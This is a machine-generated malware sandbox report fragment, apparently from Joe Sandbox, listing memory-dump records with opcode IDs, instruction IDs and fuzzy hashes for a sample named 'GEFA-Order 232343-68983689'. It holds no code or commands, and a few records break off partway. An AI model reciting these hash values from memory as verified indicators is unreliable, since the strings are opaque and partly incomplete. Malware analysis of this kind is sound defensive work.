                                          • Opcode Fuzzy Hash: b63b37450810a3c1fb5478d3c477e999507276a11169923dc6534f92bc06e312
                                          • Instruction Fuzzy Hash: CAF0A770909384DFC791DF7D94555587FF49B0A210F1002EAD484DB697E3311544DB51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a5213c38c13c33a61ad8acff5c51aef8acd33bce2d105e2d2f07f6d2c1402f57
                                          • Instruction ID: dd16de7d238a9b28944d8f21055b1cddf84769eeb7966a0fc00f1602e1c29bcf
                                          • Opcode Fuzzy Hash: a5213c38c13c33a61ad8acff5c51aef8acd33bce2d105e2d2f07f6d2c1402f57
                                          • Instruction Fuzzy Hash: 4BE06830049304AFC300DF61C8116A4BBB8DB43300B10C08D98484B242C5334E06CB92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c30d9a05b86c008321b015199d4f7fdec10c9ff530baa62dc5e868a1fe71764c
                                          • Instruction ID: 65959be89205621d9f99ddcae64f8460224247e09ea02060f379c1f38bc6e82d
                                          • Opcode Fuzzy Hash: c30d9a05b86c008321b015199d4f7fdec10c9ff530baa62dc5e868a1fe71764c
                                          • Instruction Fuzzy Hash: 9AF03074D09208AFC745CFA8D9525ACBBB4EB89300F54C09AD85897381D6725E55DF82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 671b935cac1f2fa7467eea0709d7154299d1394b3495864a22a53cc661c70268
                                          • Instruction ID: f2e69ea1bb7712808d26ff464e75df2a0371cd6639e9313160e184f049b35ae0
                                          • Opcode Fuzzy Hash: 671b935cac1f2fa7467eea0709d7154299d1394b3495864a22a53cc661c70268
                                          • Instruction Fuzzy Hash: 08019274E102699FDBA4DF64DC54BDCBBB1BB49700F5045DADA0DA7250DA301E80CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 70bf46de791aff539dc2c0699c84a3f0b3b268ad92a679b498f437f512ec4994
                                          • Instruction ID: 862525beb3dc60465bdaa16f245f5129c574889fe8a51d0f55c361ecda647fc9
                                          • Opcode Fuzzy Hash: 70bf46de791aff539dc2c0699c84a3f0b3b268ad92a679b498f437f512ec4994
                                          • Instruction Fuzzy Hash: 96016270901258CFEB90DF58D849BADBBB2BB05305F4481A5E049ABA55DB745E88CF21
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cee0936f6b90c96bbb4f0e2ecc28709451e829555ddffe0f0f835357b407de49
                                          • Instruction ID: eaac22e956653aa1a10590a02c5fcb3dacb3b803bb6f47d6d96799a0f06d9627
                                          • Opcode Fuzzy Hash: cee0936f6b90c96bbb4f0e2ecc28709451e829555ddffe0f0f835357b407de49
                                          • Instruction Fuzzy Hash: 74F0657090A384EFDB51EF7894455A8BFF4DB06201F5444DEE8C4D3242D6305A48CB52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1a307f0c8edd4da44c15a4cb79cdf60bea14d7b8ef56fd9c87f1d5a6dd63a951
                                          • Instruction ID: 85647017ddc608bc023e13b4820643bd659ad551d33e95cf5ab11db5b813ce0c
                                          • Opcode Fuzzy Hash: 1a307f0c8edd4da44c15a4cb79cdf60bea14d7b8ef56fd9c87f1d5a6dd63a951
                                          • Instruction Fuzzy Hash: 3701CF70D01228DFEFA0CF24D895BDDBBB1BB4A310F1095A9C449B3240CB348AC48F61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f97ebb99ad651e927c5becbc13c95bcb20b7590e9282f1de83f7c79d7ab6b52
                                          • Instruction ID: b0757ca939e8b237aed949aec38166c01cc066d69dd4281651dd1d8f15c7ae03
                                          • Opcode Fuzzy Hash: 1f97ebb99ad651e927c5becbc13c95bcb20b7590e9282f1de83f7c79d7ab6b52
                                          • Instruction Fuzzy Hash: EDF0F874D04248EFCB80DFA9C840ABDBBF8AB49310F14C49AA869D3241D6359A15EF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d034a0c389b6bafc46fb7460714c0d52abe5ba771f213414491b67acee655265
                                          • Instruction ID: bf40408533cc8e508df0aeb1274c93f40c279fea5bb9832b14bdbcdc0767bad9
                                          • Opcode Fuzzy Hash: d034a0c389b6bafc46fb7460714c0d52abe5ba771f213414491b67acee655265
                                          • Instruction Fuzzy Hash: 44E0ED74808204EFCB05CBA0D9454BCBFB1EB46321F1481CBD806AB313C2314A56EB62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e29ca70bf79eb9e34b863a9b02dfae56e200c8bd3023ddbe5876fa693fa9565
                                          • Instruction ID: 404a088c01dde59327c8a57700c9c7a2ca1a51332e12d408cce00a890fbf3680
                                          • Opcode Fuzzy Hash: 4e29ca70bf79eb9e34b863a9b02dfae56e200c8bd3023ddbe5876fa693fa9565
                                          • Instruction Fuzzy Hash: F1E06D70905389AFCB42EF68D854689BBB6EF86201B0546DAE409DB202E5751F048792
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a72376f4c707e8a62eb5ba0aeb78ae3c988eef02d54f41f4033d1938c581da83
                                          • Instruction ID: d224711adf58e736866df3e5d75cfa1989fc014965308414c859c93b74f055a4
                                          • Opcode Fuzzy Hash: a72376f4c707e8a62eb5ba0aeb78ae3c988eef02d54f41f4033d1938c581da83
                                          • Instruction Fuzzy Hash: 89E09271846254AFCB02EBB488159DB7BB88B05300F1244E69909A7691E9318A0597D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff5f75ea0c4d5875abf16228d35353c9ab271bbaa04c227367e61b5727d8780a
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ea9d16cf4d6321e9e40076957a4dbe8b78498154f49a813d16a466c49a77ee6
                                          • Instruction ID: c97c829f2242a79679fa23b0d675301559af3676d3ad5a7632441ad15828a4f2
                                          • Opcode Fuzzy Hash: 1ea9d16cf4d6321e9e40076957a4dbe8b78498154f49a813d16a466c49a77ee6
                                          • Instruction Fuzzy Hash: 3DE01A74D04208EFCB08DFA9D8415BCBBB8EB49301F20C0AAE81857381DB315A02EF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db4ba17a65b64799152d6e5d2feb80bb2abc50e16c19312e425e11e789f0ab38
                                          • Instruction ID: 8155121edf25cf8e95be5574f8d706c5d0aae0a97a156deda1838dc4b1c45991
                                          • Opcode Fuzzy Hash: db4ba17a65b64799152d6e5d2feb80bb2abc50e16c19312e425e11e789f0ab38
                                          • Instruction Fuzzy Hash: 2EE04674A15208EFCB80DFB8C445AACBFF4EB08300F2081A9E808D7320E6309E40DB51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: deead8bc27e1a9d9bd32ce8e277ce3753d66e4210fc454528f3753d833469847
                                          • Instruction ID: be38551a0e9214baa00a4aa80c24118e935ddeea28854a7c7ca06e521f47f8b5
                                          • Opcode Fuzzy Hash: deead8bc27e1a9d9bd32ce8e277ce3753d66e4210fc454528f3753d833469847
                                          • Instruction Fuzzy Hash: 50E08638904208EFCB04DFA4E8419ACBF75EB49310F10C0A9EC0417340CA719E55DB95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7907931201b7c0d1e9ee21fad1193882a87cffe4a8eee654fcc323029d4087ff
                                          • Instruction ID: 8e578fb653d9fdfb54ce9e19c7318160a633640bc5eeadc95db3c5f941aee483
                                          • Opcode Fuzzy Hash: 7907931201b7c0d1e9ee21fad1193882a87cffe4a8eee654fcc323029d4087ff
                                          • Instruction Fuzzy Hash: DCF0C034D04259CFEF60CF61C454BBEB7B1BB06301F189499D485A7244CB744A80DF76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 895f549336d07b3e0d61bc3f54252208437cee1d70285c856ec66c4bdc55f592
                                          • Instruction ID: 6270858309fc9102c3654f353726aa1f5f49d35fb1b91898d63ac6f75a8cf004
                                          • Opcode Fuzzy Hash: 895f549336d07b3e0d61bc3f54252208437cee1d70285c856ec66c4bdc55f592
                                          • Instruction Fuzzy Hash: 76E04F34D04208EFCB44DFA9D4455ACFBB9EB48300F10C0A9D80C57340CA319E01DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 66bbb08b1035b5726dcb9f4c37c346ee02dc654e3fabfcd4283c1dcc388fc802
                                          • Instruction ID: f8c77d206ae533c403cbafbb57a566494d87142f9ad04fbf803de3360596db83
                                          • Opcode Fuzzy Hash: 66bbb08b1035b5726dcb9f4c37c346ee02dc654e3fabfcd4283c1dcc388fc802
                                          • Instruction Fuzzy Hash: 67D02E31A403109BEFE066B0AC01FA233A89F067E6F100069EA285F2C0CAB2E801C391
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7269f2b0cd2f4e18188171a756b1400c54c4e2727a10769fa3d81ee173b6cf68
                                          • Instruction ID: 5e8d3df9caf0f6640031475597fb38112e8b8d9eb9a4735ba4833467033179cf
                                          • Opcode Fuzzy Hash: 7269f2b0cd2f4e18188171a756b1400c54c4e2727a10769fa3d81ee173b6cf68
                                          • Instruction Fuzzy Hash: 6BF0AC74A04128CFDB54AF58E498B9DB772EB95341F148896D60AA7380CA345E848FA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a5dbf3ce1bdb1b46783068a464d910011dbf9d69d53d07bff883684af760de7
                                          • Instruction ID: b7cd8116a1de95fc3708f75d01c7ec5d118bb5a738548a92bdcc4d29116baaee
                                          • Opcode Fuzzy Hash: 3a5dbf3ce1bdb1b46783068a464d910011dbf9d69d53d07bff883684af760de7
                                          • Instruction Fuzzy Hash: C9E0B674D15208EFC784EFA8D9556ACBBF9EB49214F6080A9D80C97341EA32AA45DB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ec88490e8f07c1377b1762890568921c532f3b206919b30e2bf5ed3a6aeb4cc7
                                          • Instruction ID: c86366c04e9ae7f870429be26e8b845bae16f7d700a9abaea27a0aad7ab04440
                                          • Opcode Fuzzy Hash: ec88490e8f07c1377b1762890568921c532f3b206919b30e2bf5ed3a6aeb4cc7
                                          • Instruction Fuzzy Hash: B7D05E35106344AFC3019E20D809CC33F6ADF9752030282EAF5408B622DA32981486A2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c4ae26c2213731d26a3829e9a4fd35469e6c2e0135c1cb8743ad897a306d130c
                                          • Instruction ID: 4ee87a717103125dc0d99b12090306f84b3cb6c1904581f1230d5b0d96716c8d
                                          • Opcode Fuzzy Hash: c4ae26c2213731d26a3829e9a4fd35469e6c2e0135c1cb8743ad897a306d130c
                                          • Instruction Fuzzy Hash: 4FE0C234908208EFC704DFA4D4515BCBFB8EB89300F20C09DE8091B340DB319E02DB86
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c4ae26c2213731d26a3829e9a4fd35469e6c2e0135c1cb8743ad897a306d130c
                                          • Instruction ID: 5689b947eae9c6faa437a6b39f292009365fab33525187b881f9211ac5d2804d
                                          • Opcode Fuzzy Hash: c4ae26c2213731d26a3829e9a4fd35469e6c2e0135c1cb8743ad897a306d130c
                                          • Instruction Fuzzy Hash: 44E0C234D08208EFC704DFA4D4455BCBBB4EB89300F20C0AAD80817340DB319E02EF85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b60c6cad9db9655145847a23de584de05a7f9c2434b58d92e4015a9d653ae3fc
                                          • Instruction ID: 39ff643e908ee2862b23ad42e5891de200adea5be267686a21e3d338fda08b6b
                                          • Opcode Fuzzy Hash: b60c6cad9db9655145847a23de584de05a7f9c2434b58d92e4015a9d653ae3fc
                                          • Instruction Fuzzy Hash: 55E01271941208EBCB40EFB8C80969E7BF9DB49300F1144A69909A7250EE314A04AB96
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bda9f4e6d3675de95e97c864628eee1a9e9401bdea1b76b57357e1c5c8e641c4
                                          • Instruction ID: 44f40f07d04f11d9fefdbe0ddb380119e2c2e147fb8dbe176e6e85983f2fefcb
                                          • Opcode Fuzzy Hash: bda9f4e6d3675de95e97c864628eee1a9e9401bdea1b76b57357e1c5c8e641c4
                                          • Instruction Fuzzy Hash: 50E0C274908208EFC704DFA8D8415BCBBB8EB89300F20C099D80927380DB715E82DBD0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7c59cf023c918269d95fd5f859d3c84d6272f24dfb8bd14e0305e6f6e3c7a8f
                                          • Instruction ID: 182bc2a76788b117647177851c2a7b48d4cddde124caa2ab50b0538538bbf682
                                          • Opcode Fuzzy Hash: d7c59cf023c918269d95fd5f859d3c84d6272f24dfb8bd14e0305e6f6e3c7a8f
                                          • Instruction Fuzzy Hash: 73E0EC35909218EBC744EFA5D5519ACBFB9EB4A314F20C1A9980817341CA315E46DF85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e48c12cda983ecb0d64737f6c273c5f2c391d22a3a92e58743a65f367e5cfcba
                                          • Instruction ID: 09c5f1ffa8971849d420183b2d38a9fe82cdc10b05bf989ca46f5b93784f8759
                                          • Opcode Fuzzy Hash: e48c12cda983ecb0d64737f6c273c5f2c391d22a3a92e58743a65f367e5cfcba
                                          • Instruction Fuzzy Hash: EFD0C731750528574B54A5ED75004AA77CDCBC91657188466DA0DC3744E925DC0187D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bedd4b0c7fd91d42fb1599c1ddcbf59e448ca48c752403d54709685d17ebbfb4
                                          • Instruction ID: 6a473cf5503f6febdf6248fe734f302e4fafecadff14388e5dea115753f093c7
                                          • Opcode Fuzzy Hash: bedd4b0c7fd91d42fb1599c1ddcbf59e448ca48c752403d54709685d17ebbfb4
                                          • Instruction Fuzzy Hash: 7AE0EC34949208EBCB44DFA5D5415ACBBF5EB49314F20C199980817341CA329E46DB95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5004b1a86555c9ca6020f119346938254b9ef895de92e9365657f541978e3bdb
                                          • Instruction ID: 32c3bb0a9fec1e7c11d38098d4cdc4363e9a3f31f8f88ad8ad824d0351d4f763
                                          • Opcode Fuzzy Hash: 5004b1a86555c9ca6020f119346938254b9ef895de92e9365657f541978e3bdb
                                          • Instruction Fuzzy Hash: E3E01771D8120CEBC781FFB8C9096AE7BF9DB09301F1184AA950D97250EE314E04ABA6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb2fbc41a9d01d8c24369b7fca0d0f22c85d34398da89f6627fbecef4235b637
                                          • Instruction ID: c258b81ade78804220e1b8f6a9e66501481ea5e19085840c280df701fdcc0692
                                          • Opcode Fuzzy Hash: bb2fbc41a9d01d8c24369b7fca0d0f22c85d34398da89f6627fbecef4235b637
                                          • Instruction Fuzzy Hash: 31E0EC74D55308EFC780DFBCE4556ACBBB4AB0C301F6040A9D808E3341E7305A44DB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 822c8774ec773755fd807d93a8c23864860939ddbe9a73bac4a69065a4599358
                                          • Instruction ID: bca83075a5a1e6611ab07cb40082ba623bc7a48839c2b01562a5df5170f84c6b
                                          • Opcode Fuzzy Hash: 822c8774ec773755fd807d93a8c23864860939ddbe9a73bac4a69065a4599358
                                          • Instruction Fuzzy Hash: 10E0EC70D15218EFCB80EFB8D4452ACBBB5AB08305F5080AAA90993340E6705A44DB51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d1c8db678737592a2d45cc0bc1725f89b03447f9399cd06733a5e6b273e030f
                                          • Instruction ID: 99331ff1025aa44b4f957ffa669ed3eb85a98aebed79085db464dbd142d4d2dc
                                          • Opcode Fuzzy Hash: 2d1c8db678737592a2d45cc0bc1725f89b03447f9399cd06733a5e6b273e030f
                                          • Instruction Fuzzy Hash: 99E01270A01308EFCB40DFB8E95166DB7BAEB94305F118599D909DB340E972AF00AB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a8a2c44776851075f8c323507fb61730ffba463ddaed10de5111859b1342ba54
                                          • Instruction ID: ab43357f2b646ba3cc4f332a0f606ca533dd5dfba65d52b7deb9bed1b98f3a68
                                          • Opcode Fuzzy Hash: a8a2c44776851075f8c323507fb61730ffba463ddaed10de5111859b1342ba54
                                          • Instruction Fuzzy Hash: 33D01771C5A208EBC704DFB4E5056BDBBB9AB4A351F1081A9980967340CA301A45DB95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15a6099dd48f933201b71ffef6bb9ee2309b483ef38f0773743c25bb56ecad7e
                                          • Instruction ID: c7d475273747f131576a671625e45af1527b33383156ec65cf04a7bdf6fc6727
                                          • Opcode Fuzzy Hash: 15a6099dd48f933201b71ffef6bb9ee2309b483ef38f0773743c25bb56ecad7e
                                          • Instruction Fuzzy Hash: 25D0A730519208EFC744DBA6D411AB8B7BCDB4A314F10C09D9C0C5B341DA339D01DB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5ebc77d43cce35f60550dc3d16bb48543799d932fe1e08f3a6a33c39e003b590
                                          • Instruction ID: 16c6286e87b907529eb2d83db1de6c6c609eb6942e42ced9c2a59aa16b52fbc1
                                          • Opcode Fuzzy Hash: 5ebc77d43cce35f60550dc3d16bb48543799d932fe1e08f3a6a33c39e003b590
                                          • Instruction Fuzzy Hash: DBD0A931B046620F8B61D33DBC0498B7BDA8FCC6123084A69B08AE3708EE60DD0287E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb91a5630302184ae4289c7fcc2291198863d3455e68eaea1037a9e679e1927d
                                          • Instruction ID: 8c4022bffc7d3a190528c8ab3d491275ebc5442cd4fab831fbf463481a7188ba
                                          • Opcode Fuzzy Hash: fb91a5630302184ae4289c7fcc2291198863d3455e68eaea1037a9e679e1927d
                                          • Instruction Fuzzy Hash: D1D013317001185747D4555DA51055977CDCFC9151715C1559E4FD7344DD61DC0347D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: )
                                          • API String ID: 0-2427484129
                                          • Opcode ID: 04702f1f9001a93154d228c01189ea13c22e58a069c08162b9c3b511e65ac15a
                                          • Instruction ID: e815ade0d69a6232e73faeb88a8c8f9533ce3d91dee40bb8e32736befec3000e
                                          • Opcode Fuzzy Hash: 04702f1f9001a93154d228c01189ea13c22e58a069c08162b9c3b511e65ac15a
